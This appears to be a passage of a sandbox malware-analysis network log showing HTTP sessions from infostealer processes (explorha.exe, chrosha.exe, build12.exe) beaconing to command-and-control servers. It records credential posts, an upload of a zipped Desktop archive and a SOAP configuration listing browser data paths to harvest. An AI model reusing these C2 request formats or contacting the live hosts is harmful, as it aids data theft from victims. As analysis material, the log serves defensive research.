Apr 19, 2024 03:30:07.957851887 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:30:07.987552881 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:08.231852055 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.5 | 49886 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:07.998984098 CEST | 183 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 31
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 64 31 3d 31 30 30 30 31 38 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                      Data Ascii: d1=1000188001&unit=246122658369
Apr 19, 2024 03:30:08.246169090 CEST | 193 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4 <c>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.5 | 49887 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:08.666785955 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:08.912692070 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:08.914594889 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:09.164545059 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.5 | 49888 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:08.667772055 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:08.908885002 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.5 | 49889 | 147.185.221.19 | 30946 | 7324 | C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:08.701119900 CEST | 248 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 137
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
Apr 19, 2024 03:30:09.131906033 CEST | 385 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 137
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnect xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Apr 19, 2024 03:30:19.787519932 CEST | 359 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 212
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:19 GMT
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Apr 19, 2024 03:30:20.096012115 CEST | 359 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 212
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:19 GMT
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Apr 19, 2024 03:30:24.843470097 CEST | 231 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 144
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
Apr 19, 2024 03:30:33.711553097 CEST | 1248 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 4744
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:33 GMT
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFIL


Session ID | Source IP | Source Port | Destination IP | Destination Port
69 | 192.168.2.5 | 49890 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:08.961575031 CEST | 156 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 5
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 77 6c 74 3d 31
                                                                                                                                                                                                                                      Data Ascii: wlt=1
Apr 19, 2024 03:30:09.212527037 CEST | 719 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Ascii: 210 +++_1_9d3fd802182dc15a34a197b6fcd46ab98e600cbdae6d3d539498f1025ab87ae7027100921fe7a66adf5f-1-_2_cf24d14a2e728f6966fbc4fdbac63e88d83959fbfe604d0dd892f1335cec2d93532353c958b2d066d82c-2-_3_b338b0001b16c91a6da2a5ffd6e945999e3502adab627d008bd9813406b375e62f34-3-_4_bb1e83090d27d21f76a49c80ddc55e8aa10a0f82cd2252009dc1a63b17975ab60924-4-_5_cb6e9311310c8e4379abc0a5c8f445fa85202ea2cd644c67acdd8c1d29802fad530917bf35e9df7fbb222d5a864a590c4cb89946377e3495e61b5cee99c1e7e2f3acbb7efa33ae2709267151cf0cd6291f8143482349f9acf21b3d784e272d-5-0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.5 | 49891 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:09.153615952 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:09.398745060 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:30:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.5 | 49892 | 193.233.132.167 | 80 | 3844 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:09.223113060 CEST | 173 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 21
Cache-Control: no-cache
Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
Data Ascii: id=246122658369&cred=
Apr 19, 2024 03:30:09.471394062 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:30:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Apr 19, 2024 03:30:12.813725948 CEST | 169 | OUT | POST /enigma/index.php?wal=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----NDYyMQ==
Host: 193.233.132.167
Content-Length: 4781
Cache-Control: no-cache
Apr 19, 2024 03:30:12.813757896 CEST | 140 | OUT
Data Ascii: ------NDYyMQ==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
Apr 19, 2024 03:30:13.080621004 CEST | 190 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:30:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.5 | 49893 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:09.523113012 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:30:09.771038055 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:30:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:09.791385889 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:10.042619944 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:30:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      73192.168.2.549894193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:09.789484024 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:10.040970087 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.5 | 49895 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:10.290652990 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:10.539504051 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.5 | 49896 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:10.396213055 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:10.639931917 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:10.641870022 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:10.890790939 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.5 | 49897 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:10.902688026 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:11.152785063 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.5 | 49899 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:11.243176937 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:11.491249084 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:11.494462967 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
